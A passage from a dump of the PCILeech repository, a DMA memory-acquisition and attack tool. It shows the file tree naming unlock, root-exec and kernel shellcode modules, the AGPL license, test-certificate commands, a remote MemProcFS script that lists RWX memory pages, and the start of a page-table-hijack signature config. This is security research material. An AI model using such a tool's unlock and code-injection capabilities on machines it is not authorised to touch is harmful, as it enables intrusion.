Showing preview only (1,766K chars total). Download the full file or copy to clipboard to get everything.
Repository: ufrisk/pcileech
Branch: master
Commit: bcfdec117b82
Files: 189
Total size: 1.7 MB
Directory structure:
gitextract_qpoecbmd/
├── .gitignore
├── LICENSE
├── files/
│ ├── Certs/
│ │ └── readme.txt
│ ├── agent-find-rwx.py
│ ├── fbsdx64_filepull.ksh
│ ├── lx64_exec_root.ksh
│ ├── lx64_filedelete.ksh
│ ├── lx64_filepull.ksh
│ ├── lx64_filepush.ksh
│ ├── macos_filepull.ksh
│ ├── macos_filepush.ksh
│ ├── macos_unlock.ksh
│ ├── pcileech.icns
│ ├── pcileech.txt
│ ├── pcileech_gensig.cfg
│ ├── signature_info.txt
│ ├── stickykeys_cmd_win.sig
│ ├── uefi_textout.ksh
│ ├── uefi_winload_ntos_patch.ksh
│ ├── unlock_macos.sig
│ ├── unlock_win10x64.sig
│ ├── unlock_win10x86.sig
│ ├── unlock_win11x64.sig
│ ├── unlock_win8x64.sig
│ ├── unlock_winvistax64.sig
│ ├── win7x64.kmd
│ ├── winvistax64.kmd
│ ├── wx64_driverinfo.ksh
│ ├── wx64_driverload_svc.ksh
│ ├── wx64_driverunload.ksh
│ ├── wx64_filepull.ksh
│ ├── wx64_filepush.ksh
│ ├── wx64_pageinfo.ksh
│ ├── wx64_pagesignature.ksh
│ ├── wx64_psblue.ksh
│ ├── wx64_pscmd.ksh
│ ├── wx64_pscmd_user.ksh
│ ├── wx64_pscreate.ksh
│ ├── wx64_pskill.ksh
│ ├── wx64_pslist.ksh
│ └── wx64_unlock.ksh
├── includes/
│ ├── dokan.h
│ ├── fileinfo.h
│ ├── leechcore.h
│ ├── leechgrpc.h
│ ├── lib32/
│ │ ├── leechcore.lib
│ │ └── vmm.lib
│ ├── lib64/
│ │ ├── leechcore.lib
│ │ └── vmm.lib
│ ├── libpdbcrust.h
│ ├── public.h
│ ├── vmmdll.h
│ └── vmmyara.h
├── pcileech/
│ ├── Makefile
│ ├── Makefile.macos
│ ├── charutil.c
│ ├── charutil.h
│ ├── device.c
│ ├── device.h
│ ├── executor.c
│ ├── executor.h
│ ├── extra.c
│ ├── extra.h
│ ├── help.c
│ ├── help.h
│ ├── kmd.c
│ ├── kmd.h
│ ├── memdump.c
│ ├── memdump.h
│ ├── mempatch.c
│ ├── mempatch.h
│ ├── ob/
│ │ ├── ob.h
│ │ ├── ob_cachemap.c
│ │ ├── ob_core.c
│ │ ├── ob_map.c
│ │ └── ob_set.c
│ ├── oscompatibility.c
│ ├── oscompatibility.h
│ ├── pcileech.c
│ ├── pcileech.h
│ ├── pcileech.rc
│ ├── pcileech.vcxproj
│ ├── pcileech.vcxproj.filters
│ ├── pcileech.vcxproj.user
│ ├── shellcode.h
│ ├── statistics.c
│ ├── statistics.h
│ ├── umd.c
│ ├── umd.h
│ ├── util.c
│ ├── util.h
│ ├── version.h
│ ├── vfs.c
│ ├── vfs.h
│ ├── vfslist.c
│ ├── vfslist.h
│ ├── vmmx.c
│ └── vmmx.h
├── pcileech.sln
├── pcileech_shellcode/
│ ├── fbsdx64_common.c
│ ├── fbsdx64_common.h
│ ├── fbsdx64_common_a.asm
│ ├── fbsdx64_filepull.c
│ ├── fbsdx64_stage2.asm
│ ├── fbsdx64_stage3.asm
│ ├── fbsdx64_stage3_c.c
│ ├── info_kmd_core.txt
│ ├── lx64_common.c
│ ├── lx64_common.h
│ ├── lx64_common_a.asm
│ ├── lx64_exec_root.c
│ ├── lx64_filedelete.c
│ ├── lx64_filepull.c
│ ├── lx64_filepush.c
│ ├── lx64_stage2.asm
│ ├── lx64_stage2_efi.asm
│ ├── lx64_stage3.asm
│ ├── lx64_stage3_c.c
│ ├── lx64_stage3_pre.asm
│ ├── lx64_vfs.c
│ ├── macos_common.c
│ ├── macos_common.h
│ ├── macos_common_a.asm
│ ├── macos_filedelete.c
│ ├── macos_filepull.c
│ ├── macos_filepush.c
│ ├── macos_stage2.asm
│ ├── macos_stage3.asm
│ ├── macos_stage3_c.c
│ ├── macos_unlock.c
│ ├── macos_vfs.c
│ ├── pcileech_shellcode.vcxproj
│ ├── pcileech_shellcode.vcxproj.filters
│ ├── pcileech_shellcode.vcxproj.user
│ ├── statuscodes.h
│ ├── uefi_common.c
│ ├── uefi_common.h
│ ├── uefi_common_a.asm
│ ├── uefi_kmd.asm
│ ├── uefi_kmd_c.c
│ ├── uefi_textout.c
│ ├── uefi_winload_ntos_kmd.asm
│ ├── uefi_winload_ntos_kmd_c.c
│ ├── uefi_winload_ntos_patch.c
│ ├── wx64_common.c
│ ├── wx64_common.h
│ ├── wx64_common_a.asm
│ ├── wx64_driverinfo.c
│ ├── wx64_driverload_svc.c
│ ├── wx64_driverunload.c
│ ├── wx64_exec_user.asm
│ ├── wx64_exec_user_c.c
│ ├── wx64_filepull.c
│ ├── wx64_filepush.c
│ ├── wx64_pageinfo.asm
│ ├── wx64_pagesignature.c
│ ├── wx64_psblue.asm
│ ├── wx64_pscreate.c
│ ├── wx64_pskill.c
│ ├── wx64_pslist.c
│ ├── wx64_stage1.asm
│ ├── wx64_stage2.asm
│ ├── wx64_stage23_vmm.asm
│ ├── wx64_stage23_vmm3.asm
│ ├── wx64_stage2_hal.asm
│ ├── wx64_stage3.asm
│ ├── wx64_stage3_c.c
│ ├── wx64_stage3_pre.asm
│ ├── wx64_umd_exec.asm
│ ├── wx64_umd_exec_c.c
│ ├── wx64_unlock.c
│ └── wx64_vfs.c
├── readme.md
├── usb3380.md
└── usb3380_flash/
├── linux/
│ ├── Makefile
│ ├── pcileech_flash.c
│ ├── readme.md
│ └── readme_flash.txt
└── windows/
├── USB3380Flash/
│ ├── USB3380Flash.c
│ ├── USB3380Flash.h
│ ├── USB3380Flash.inf
│ ├── USB3380Flash.user
│ ├── USB3380Flash.vcxproj
│ ├── USB3380Flash.vcxproj.filters
│ └── USB3380Flash.vcxproj.user
└── USB3380Flash_Installer/
├── USB3380Flash_Installer.vcxproj
├── USB3380Flash_Installer.vcxproj.filters
├── USB3380Flash_Installer.vcxproj.user
└── installer.c
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitignore
================================================
/.vs
/files/pcileech
/files/lib
/files/temp
/files/x86/lib
/files/USB3380Flash
/files/USB3380Flash_installer
*.bin
*.cod
*.dll
*.exe
*.idb
*.lnk
*.obj
*.so
*.zip
*.dylib
================================================
FILE: LICENSE
================================================
GNU AFFERO GENERAL PUBLIC LICENSE
Version 3, 19 November 2007
Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The GNU Affero General Public License is a free, copyleft license for
software and other kinds of works, specifically designed to ensure
cooperation with the community in the case of network server software.
The licenses for most software and other practical works are designed
to take away your freedom to share and change the works. By contrast,
our General Public Licenses are intended to guarantee your freedom to
share and change all versions of a program--to make sure it remains free
software for all its users.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
them if you wish), that you receive source code or can get it if you
want it, that you can change the software or use pieces of it in new
free programs, and that you know you can do these things.
Developers that use our General Public Licenses protect your rights
with two steps: (1) assert copyright on the software, and (2) offer
you this License which gives you legal permission to copy, distribute
and/or modify the software.
A secondary benefit of defending all users' freedom is that
improvements made in alternate versions of the program, if they
receive widespread use, become available for other developers to
incorporate. Many developers of free software are heartened and
encouraged by the resulting cooperation. However, in the case of
software used on network servers, this result may fail to come about.
The GNU General Public License permits making a modified version and
letting the public access it on a server without ever releasing its
source code to the public.
The GNU Affero General Public License is designed specifically to
ensure that, in such cases, the modified source code becomes available
to the community. It requires the operator of a network server to
provide the source code of the modified version running there to the
users of that server. Therefore, public use of a modified version, on
a publicly accessible server, gives the public access to the source
code of the modified version.
An older license, called the Affero General Public License and
published by Affero, was designed to accomplish similar goals. This is
a different license, not a version of the Affero GPL, but Affero has
released a new version of the Affero GPL which permits relicensing under
this license.
The precise terms and conditions for copying, distribution and
modification follow.
TERMS AND CONDITIONS
0. Definitions.
"This License" refers to version 3 of the GNU Affero General Public License.
"Copyright" also means copyright-like laws that apply to other kinds of
works, such as semiconductor masks.
"The Program" refers to any copyrightable work licensed under this
License. Each licensee is addressed as "you". "Licensees" and
"recipients" may be individuals or organizations.
To "modify" a work means to copy from or adapt all or part of the work
in a fashion requiring copyright permission, other than the making of an
exact copy. The resulting work is called a "modified version" of the
earlier work or a work "based on" the earlier work.
A "covered work" means either the unmodified Program or a work based
on the Program.
To "propagate" a work means to do anything with it that, without
permission, would make you directly or secondarily liable for
infringement under applicable copyright law, except executing it on a
computer or modifying a private copy. Propagation includes copying,
distribution (with or without modification), making available to the
public, and in some countries other activities as well.
To "convey" a work means any kind of propagation that enables other
parties to make or receive copies. Mere interaction with a user through
a computer network, with no transfer of a copy, is not conveying.
An interactive user interface displays "Appropriate Legal Notices"
to the extent that it includes a convenient and prominently visible
feature that (1) displays an appropriate copyright notice, and (2)
tells the user that there is no warranty for the work (except to the
extent that warranties are provided), that licensees may convey the
work under this License, and how to view a copy of this License. If
the interface presents a list of user commands or options, such as a
menu, a prominent item in the list meets this criterion.
1. Source Code.
The "source code" for a work means the preferred form of the work
for making modifications to it. "Object code" means any non-source
form of a work.
A "Standard Interface" means an interface that either is an official
standard defined by a recognized standards body, or, in the case of
interfaces specified for a particular programming language, one that
is widely used among developers working in that language.
The "System Libraries" of an executable work include anything, other
than the work as a whole, that (a) is included in the normal form of
packaging a Major Component, but which is not part of that Major
Component, and (b) serves only to enable use of the work with that
Major Component, or to implement a Standard Interface for which an
implementation is available to the public in source code form. A
"Major Component", in this context, means a major essential component
(kernel, window system, and so on) of the specific operating system
(if any) on which the executable work runs, or a compiler used to
produce the work, or an object code interpreter used to run it.
The "Corresponding Source" for a work in object code form means all
the source code needed to generate, install, and (for an executable
work) run the object code and to modify the work, including scripts to
control those activities. However, it does not include the work's
System Libraries, or general-purpose tools or generally available free
programs which are used unmodified in performing those activities but
which are not part of the work. For example, Corresponding Source
includes interface definition files associated with source files for
the work, and the source code for shared libraries and dynamically
linked subprograms that the work is specifically designed to require,
such as by intimate data communication or control flow between those
subprograms and other parts of the work.
The Corresponding Source need not include anything that users
can regenerate automatically from other parts of the Corresponding
Source.
The Corresponding Source for a work in source code form is that
same work.
2. Basic Permissions.
All rights granted under this License are granted for the term of
copyright on the Program, and are irrevocable provided the stated
conditions are met. This License explicitly affirms your unlimited
permission to run the unmodified Program. The output from running a
covered work is covered by this License only if the output, given its
content, constitutes a covered work. This License acknowledges your
rights of fair use or other equivalent, as provided by copyright law.
You may make, run and propagate covered works that you do not
convey, without conditions so long as your license otherwise remains
in force. You may convey covered works to others for the sole purpose
of having them make modifications exclusively for you, or provide you
with facilities for running those works, provided that you comply with
the terms of this License in conveying all material for which you do
not control copyright. Those thus making or running the covered works
for you must do so exclusively on your behalf, under your direction
and control, on terms that prohibit them from making any copies of
your copyrighted material outside their relationship with you.
Conveying under any other circumstances is permitted solely under
the conditions stated below. Sublicensing is not allowed; section 10
makes it unnecessary.
3. Protecting Users' Legal Rights From Anti-Circumvention Law.
No covered work shall be deemed part of an effective technological
measure under any applicable law fulfilling obligations under article
11 of the WIPO copyright treaty adopted on 20 December 1996, or
similar laws prohibiting or restricting circumvention of such
measures.
When you convey a covered work, you waive any legal power to forbid
circumvention of technological measures to the extent such circumvention
is effected by exercising rights under this License with respect to
the covered work, and you disclaim any intention to limit operation or
modification of the work as a means of enforcing, against the work's
users, your or third parties' legal rights to forbid circumvention of
technological measures.
4. Conveying Verbatim Copies.
You may convey verbatim copies of the Program's source code as you
receive it, in any medium, provided that you conspicuously and
appropriately publish on each copy an appropriate copyright notice;
keep intact all notices stating that this License and any
non-permissive terms added in accord with section 7 apply to the code;
keep intact all notices of the absence of any warranty; and give all
recipients a copy of this License along with the Program.
You may charge any price or no price for each copy that you convey,
and you may offer support or warranty protection for a fee.
5. Conveying Modified Source Versions.
You may convey a work based on the Program, or the modifications to
produce it from the Program, in the form of source code under the
terms of section 4, provided that you also meet all of these conditions:
a) The work must carry prominent notices stating that you modified
it, and giving a relevant date.
b) The work must carry prominent notices stating that it is
released under this License and any conditions added under section
7. This requirement modifies the requirement in section 4 to
"keep intact all notices".
c) You must license the entire work, as a whole, under this
License to anyone who comes into possession of a copy. This
License will therefore apply, along with any applicable section 7
additional terms, to the whole of the work, and all its parts,
regardless of how they are packaged. This License gives no
permission to license the work in any other way, but it does not
invalidate such permission if you have separately received it.
d) If the work has interactive user interfaces, each must display
Appropriate Legal Notices; however, if the Program has interactive
interfaces that do not display Appropriate Legal Notices, your
work need not make them do so.
A compilation of a covered work with other separate and independent
works, which are not by their nature extensions of the covered work,
and which are not combined with it such as to form a larger program,
in or on a volume of a storage or distribution medium, is called an
"aggregate" if the compilation and its resulting copyright are not
used to limit the access or legal rights of the compilation's users
beyond what the individual works permit. Inclusion of a covered work
in an aggregate does not cause this License to apply to the other
parts of the aggregate.
6. Conveying Non-Source Forms.
You may convey a covered work in object code form under the terms
of sections 4 and 5, provided that you also convey the
machine-readable Corresponding Source under the terms of this License,
in one of these ways:
a) Convey the object code in, or embodied in, a physical product
(including a physical distribution medium), accompanied by the
Corresponding Source fixed on a durable physical medium
customarily used for software interchange.
b) Convey the object code in, or embodied in, a physical product
(including a physical distribution medium), accompanied by a
written offer, valid for at least three years and valid for as
long as you offer spare parts or customer support for that product
model, to give anyone who possesses the object code either (1) a
copy of the Corresponding Source for all the software in the
product that is covered by this License, on a durable physical
medium customarily used for software interchange, for a price no
more than your reasonable cost of physically performing this
conveying of source, or (2) access to copy the
Corresponding Source from a network server at no charge.
c) Convey individual copies of the object code with a copy of the
written offer to provide the Corresponding Source. This
alternative is allowed only occasionally and noncommercially, and
only if you received the object code with such an offer, in accord
with subsection 6b.
d) Convey the object code by offering access from a designated
place (gratis or for a charge), and offer equivalent access to the
Corresponding Source in the same way through the same place at no
further charge. You need not require recipients to copy the
Corresponding Source along with the object code. If the place to
copy the object code is a network server, the Corresponding Source
may be on a different server (operated by you or a third party)
that supports equivalent copying facilities, provided you maintain
clear directions next to the object code saying where to find the
Corresponding Source. Regardless of what server hosts the
Corresponding Source, you remain obligated to ensure that it is
available for as long as needed to satisfy these requirements.
e) Convey the object code using peer-to-peer transmission, provided
you inform other peers where the object code and Corresponding
Source of the work are being offered to the general public at no
charge under subsection 6d.
A separable portion of the object code, whose source code is excluded
from the Corresponding Source as a System Library, need not be
included in conveying the object code work.
A "User Product" is either (1) a "consumer product", which means any
tangible personal property which is normally used for personal, family,
or household purposes, or (2) anything designed or sold for incorporation
into a dwelling. In determining whether a product is a consumer product,
doubtful cases shall be resolved in favor of coverage. For a particular
product received by a particular user, "normally used" refers to a
typical or common use of that class of product, regardless of the status
of the particular user or of the way in which the particular user
actually uses, or expects or is expected to use, the product. A product
is a consumer product regardless of whether the product has substantial
commercial, industrial or non-consumer uses, unless such uses represent
the only significant mode of use of the product.
"Installation Information" for a User Product means any methods,
procedures, authorization keys, or other information required to install
and execute modified versions of a covered work in that User Product from
a modified version of its Corresponding Source. The information must
suffice to ensure that the continued functioning of the modified object
code is in no case prevented or interfered with solely because
modification has been made.
If you convey an object code work under this section in, or with, or
specifically for use in, a User Product, and the conveying occurs as
part of a transaction in which the right of possession and use of the
User Product is transferred to the recipient in perpetuity or for a
fixed term (regardless of how the transaction is characterized), the
Corresponding Source conveyed under this section must be accompanied
by the Installation Information. But this requirement does not apply
if neither you nor any third party retains the ability to install
modified object code on the User Product (for example, the work has
been installed in ROM).
The requirement to provide Installation Information does not include a
requirement to continue to provide support service, warranty, or updates
for a work that has been modified or installed by the recipient, or for
the User Product in which it has been modified or installed. Access to a
network may be denied when the modification itself materially and
adversely affects the operation of the network or violates the rules and
protocols for communication across the network.
Corresponding Source conveyed, and Installation Information provided,
in accord with this section must be in a format that is publicly
documented (and with an implementation available to the public in
source code form), and must require no special password or key for
unpacking, reading or copying.
7. Additional Terms.
"Additional permissions" are terms that supplement the terms of this
License by making exceptions from one or more of its conditions.
Additional permissions that are applicable to the entire Program shall
be treated as though they were included in this License, to the extent
that they are valid under applicable law. If additional permissions
apply only to part of the Program, that part may be used separately
under those permissions, but the entire Program remains governed by
this License without regard to the additional permissions.
When you convey a copy of a covered work, you may at your option
remove any additional permissions from that copy, or from any part of
it. (Additional permissions may be written to require their own
removal in certain cases when you modify the work.) You may place
additional permissions on material, added by you to a covered work,
for which you have or can give appropriate copyright permission.
Notwithstanding any other provision of this License, for material you
add to a covered work, you may (if authorized by the copyright holders of
that material) supplement the terms of this License with terms:
a) Disclaiming warranty or limiting liability differently from the
terms of sections 15 and 16 of this License; or
b) Requiring preservation of specified reasonable legal notices or
author attributions in that material or in the Appropriate Legal
Notices displayed by works containing it; or
c) Prohibiting misrepresentation of the origin of that material, or
requiring that modified versions of such material be marked in
reasonable ways as different from the original version; or
d) Limiting the use for publicity purposes of names of licensors or
authors of the material; or
e) Declining to grant rights under trademark law for use of some
trade names, trademarks, or service marks; or
f) Requiring indemnification of licensors and authors of that
material by anyone who conveys the material (or modified versions of
it) with contractual assumptions of liability to the recipient, for
any liability that these contractual assumptions directly impose on
those licensors and authors.
All other non-permissive additional terms are considered "further
restrictions" within the meaning of section 10. If the Program as you
received it, or any part of it, contains a notice stating that it is
governed by this License along with a term that is a further
restriction, you may remove that term. If a license document contains
a further restriction but permits relicensing or conveying under this
License, you may add to a covered work material governed by the terms
of that license document, provided that the further restriction does
not survive such relicensing or conveying.
If you add terms to a covered work in accord with this section, you
must place, in the relevant source files, a statement of the
additional terms that apply to those files, or a notice indicating
where to find the applicable terms.
Additional terms, permissive or non-permissive, may be stated in the
form of a separately written license, or stated as exceptions;
the above requirements apply either way.
8. Termination.
You may not propagate or modify a covered work except as expressly
provided under this License. Any attempt otherwise to propagate or
modify it is void, and will automatically terminate your rights under
this License (including any patent licenses granted under the third
paragraph of section 11).
However, if you cease all violation of this License, then your
license from a particular copyright holder is reinstated (a)
provisionally, unless and until the copyright holder explicitly and
finally terminates your license, and (b) permanently, if the copyright
holder fails to notify you of the violation by some reasonable means
prior to 60 days after the cessation.
Moreover, your license from a particular copyright holder is
reinstated permanently if the copyright holder notifies you of the
violation by some reasonable means, this is the first time you have
received notice of violation of this License (for any work) from that
copyright holder, and you cure the violation prior to 30 days after
your receipt of the notice.
Termination of your rights under this section does not terminate the
licenses of parties who have received copies or rights from you under
this License. If your rights have been terminated and not permanently
reinstated, you do not qualify to receive new licenses for the same
material under section 10.
9. Acceptance Not Required for Having Copies.
You are not required to accept this License in order to receive or
run a copy of the Program. Ancillary propagation of a covered work
occurring solely as a consequence of using peer-to-peer transmission
to receive a copy likewise does not require acceptance. However,
nothing other than this License grants you permission to propagate or
modify any covered work. These actions infringe copyright if you do
not accept this License. Therefore, by modifying or propagating a
covered work, you indicate your acceptance of this License to do so.
10. Automatic Licensing of Downstream Recipients.
Each time you convey a covered work, the recipient automatically
receives a license from the original licensors, to run, modify and
propagate that work, subject to this License. You are not responsible
for enforcing compliance by third parties with this License.
An "entity transaction" is a transaction transferring control of an
organization, or substantially all assets of one, or subdividing an
organization, or merging organizations. If propagation of a covered
work results from an entity transaction, each party to that
transaction who receives a copy of the work also receives whatever
licenses to the work the party's predecessor in interest had or could
give under the previous paragraph, plus a right to possession of the
Corresponding Source of the work from the predecessor in interest, if
the predecessor has it or can get it with reasonable efforts.
You may not impose any further restrictions on the exercise of the
rights granted or affirmed under this License. For example, you may
not impose a license fee, royalty, or other charge for exercise of
rights granted under this License, and you may not initiate litigation
(including a cross-claim or counterclaim in a lawsuit) alleging that
any patent claim is infringed by making, using, selling, offering for
sale, or importing the Program or any portion of it.
11. Patents.
A "contributor" is a copyright holder who authorizes use under this
License of the Program or a work on which the Program is based. The
work thus licensed is called the contributor's "contributor version".
A contributor's "essential patent claims" are all patent claims
owned or controlled by the contributor, whether already acquired or
hereafter acquired, that would be infringed by some manner, permitted
by this License, of making, using, or selling its contributor version,
but do not include claims that would be infringed only as a
consequence of further modification of the contributor version. For
purposes of this definition, "control" includes the right to grant
patent sublicenses in a manner consistent with the requirements of
this License.
Each contributor grants you a non-exclusive, worldwide, royalty-free
patent license under the contributor's essential patent claims, to
make, use, sell, offer for sale, import and otherwise run, modify and
propagate the contents of its contributor version.
In the following three paragraphs, a "patent license" is any express
agreement or commitment, however denominated, not to enforce a patent
(such as an express permission to practice a patent or covenant not to
sue for patent infringement). To "grant" such a patent license to a
party means to make such an agreement or commitment not to enforce a
patent against the party.
If you convey a covered work, knowingly relying on a patent license,
and the Corresponding Source of the work is not available for anyone
to copy, free of charge and under the terms of this License, through a
publicly available network server or other readily accessible means,
then you must either (1) cause the Corresponding Source to be so
available, or (2) arrange to deprive yourself of the benefit of the
patent license for this particular work, or (3) arrange, in a manner
consistent with the requirements of this License, to extend the patent
license to downstream recipients. "Knowingly relying" means you have
actual knowledge that, but for the patent license, your conveying the
covered work in a country, or your recipient's use of the covered work
in a country, would infringe one or more identifiable patents in that
country that you have reason to believe are valid.
If, pursuant to or in connection with a single transaction or
arrangement, you convey, or propagate by procuring conveyance of, a
covered work, and grant a patent license to some of the parties
receiving the covered work authorizing them to use, propagate, modify
or convey a specific copy of the covered work, then the patent license
you grant is automatically extended to all recipients of the covered
work and works based on it.
A patent license is "discriminatory" if it does not include within
the scope of its coverage, prohibits the exercise of, or is
conditioned on the non-exercise of one or more of the rights that are
specifically granted under this License. You may not convey a covered
work if you are a party to an arrangement with a third party that is
in the business of distributing software, under which you make payment
to the third party based on the extent of your activity of conveying
the work, and under which the third party grants, to any of the
parties who would receive the covered work from you, a discriminatory
patent license (a) in connection with copies of the covered work
conveyed by you (or copies made from those copies), or (b) primarily
for and in connection with specific products or compilations that
contain the covered work, unless you entered into that arrangement,
or that patent license was granted, prior to 28 March 2007.
Nothing in this License shall be construed as excluding or limiting
any implied license or other defenses to infringement that may
otherwise be available to you under applicable patent law.
12. No Surrender of Others' Freedom.
If conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License. If you cannot convey a
covered work so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you may
not convey it at all. For example, if you agree to terms that obligate you
to collect a royalty for further conveying from those to whom you convey
the Program, the only way you could satisfy both those terms and this
License would be to refrain entirely from conveying the Program.
13. Remote Network Interaction; Use with the GNU General Public License.
Notwithstanding any other provision of this License, if you modify the
Program, your modified version must prominently offer all users
interacting with it remotely through a computer network (if your version
supports such interaction) an opportunity to receive the Corresponding
Source of your version by providing access to the Corresponding Source
from a network server at no charge, through some standard or customary
means of facilitating copying of software. This Corresponding Source
shall include the Corresponding Source for any work covered by version 3
of the GNU General Public License that is incorporated pursuant to the
following paragraph.
Notwithstanding any other provision of this License, you have
permission to link or combine any covered work with a work licensed
under version 3 of the GNU General Public License into a single
combined work, and to convey the resulting work. The terms of this
License will continue to apply to the part which is the covered work,
but the work with which it is combined will remain governed by version
3 of the GNU General Public License.
14. Revised Versions of this License.
The Free Software Foundation may publish revised and/or new versions of
the GNU Affero General Public License from time to time. Such new versions
will be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
Each version is given a distinguishing version number. If the
Program specifies that a certain numbered version of the GNU Affero General
Public License "or any later version" applies to it, you have the
option of following the terms and conditions either of that numbered
version or of any later version published by the Free Software
Foundation. If the Program does not specify a version number of the
GNU Affero General Public License, you may choose any version ever published
by the Free Software Foundation.
If the Program specifies that a proxy can decide which future
versions of the GNU Affero General Public License can be used, that proxy's
public statement of acceptance of a version permanently authorizes you
to choose that version for the Program.
Later license versions may give you additional or different
permissions. However, no additional obligations are imposed on any
author or copyright holder as a result of your choosing to follow a
later version.
15. Disclaimer of Warranty.
THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
16. Limitation of Liability.
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
SUCH DAMAGES.
17. Interpretation of Sections 15 and 16.
If the disclaimer of warranty and limitation of liability provided
above cannot be given local legal effect according to their terms,
reviewing courts shall apply local law that most closely approximates
an absolute waiver of all civil liability in connection with the
Program, unless a warranty or assumption of liability accompanies a
copy of the Program in return for a fee.
END OF TERMS AND CONDITIONS
How to Apply These Terms to Your New Programs
If you develop a new program, and you want it to be of the greatest
possible use to the public, the best way to achieve this is to make it
free software which everyone can redistribute and change under these terms.
To do so, attach the following notices to the program. It is safest
to attach them to the start of each source file to most effectively
state the exclusion of warranty; and each file should have at least
the "copyright" line and a pointer to where the full notice is found.
<one line to give the program's name and a brief idea of what it does.>
Copyright (C) <year> <name of author>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as published
by the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>.
Also add information on how to contact you by electronic and paper mail.
If your software can interact with users remotely through a computer
network, you should also make sure that it provides a way for users to
get its source. For example, if your program is a web application, its
interface could display a "Source" link that leads users to an archive
of the code. There are many ways you could offer source, and different
solutions will be better for different programs; see section 13 for the
specific requirements.
You should also get your employer (if you work as a programmer) or school,
if any, to sign a "copyright disclaimer" for the program, if necessary.
For more information on this, and how to apply and follow the GNU AGPL, see
<https://www.gnu.org/licenses/>.
================================================
FILE: files/Certs/readme.txt
================================================
Example commands for generating test certificates used for gRPC mTLS remote connections.
Password to the .pfx files: test
Generate with commands:
openssl req -x509 -newkey rsa:2048 -keyout client-tls.key -out client-tls.crt -days 365 -nodes -subj "/CN=localhost"
openssl pkcs12 -export -out client-tls.p12 -inkey client-tls.key -in client-tls.crt -password pass:test
openssl req -x509 -newkey rsa:2048 -keyout server-tls.key -out server-tls.crt -days 365 -nodes -subj "/CN=localhost"
openssl pkcs12 -export -out server-tls.p12 -inkey server-tls.key -in server-tls.crt -password pass:test
================================================
FILE: files/agent-find-rwx.py
================================================
# Example file to demonstrate remote python functionality with the LeechAgent.
#
# Example:
# pcileech.exe -device <device> -remote rpc://<spn or insecure>:host agent-execpy -in agent-find-rwx.py
#
# The python script will be executed in a child process to the LeechAgent in
# the user-context of the LeechAgent. If the agent is running as a service this
# is most likely SYSTEM. It's also possible to use this functionality to run
# Python scripts on the remote host without using the memory analysis functionality.
#
# Please check out agent installation instructions at:
# https://github.com/ufrisk/LeechCore/wiki/LeechAgent
# https://github.com/ufrisk/LeechCore/wiki/LeechAgent_Install
#
#
# Example to load LeechCore for Python connecting to the memory acqusition device
# specified in the PCILeech -device parameter. Please uncomment to activate.
# Guide at: https://github.com/ufrisk/LeechCore/wiki/LeechCore_API_Python
#
'''
import leechcorepyc
lc = leechcorepyc.LeechCore('existing')
print(lc)
'''
#
# Example to load MemProcFS for Python connecting to the memory acqusition device
# specified in the PCILeech -device parameter.
# For information about MemProcFS Python API please check out the wiki for API
# usage examples and a youtube demo.
# https://github.com/ufrisk/MemProcFS/wiki/API_Python
#
#
import memprocfs
vmm = memprocfs.Vmm(['-device', 'existingremote'])
for process in vmm.process_list():
for entry in process.maps.pte():
if '-rwx' in entry['flags']:
print(str(process.pid) + ': ' + process.name + ': ' + str(entry))
================================================
FILE: files/pcileech.txt
================================================
Download the latest binaries from https://github.com/ufrisk/pcileech/releases/latest
================================================
FILE: files/pcileech_gensig.cfg
================================================
# Configuration data for the Windows 8.1/10/2012R2/2016 pagetable hijack signature generator.
# The signatures for the page table hijack attack requires (8192) two full pages of binary code
# from Microsoft binaries we hash the required pages and ask the users of PCILeech to extract
# the required code in order to avoid distributing potentially copyrighted Microsoft binary code.
#
# Each line represents a signature and populates a c-struct entry as per below:
#
# {
# .szSignatureInfoDisplay = "ntfs.sys signed on 2014-10-15 (Windows 8.1 x64)",
# .szFileName = "win8x64_ntfs_20141015.kmd",
# .szSignatureInfo = "# ntfs.sys signed on 2014-10-15 (MJ_CREATE)",
# .dwOffset1 = 0xd3000,
# .dwOffset2 = 0x4a000,
# .szHash1 = "1ac5c0df47e153480fc49bb3687df84473168bd65b4bb58ab3885f47a6116d1b",
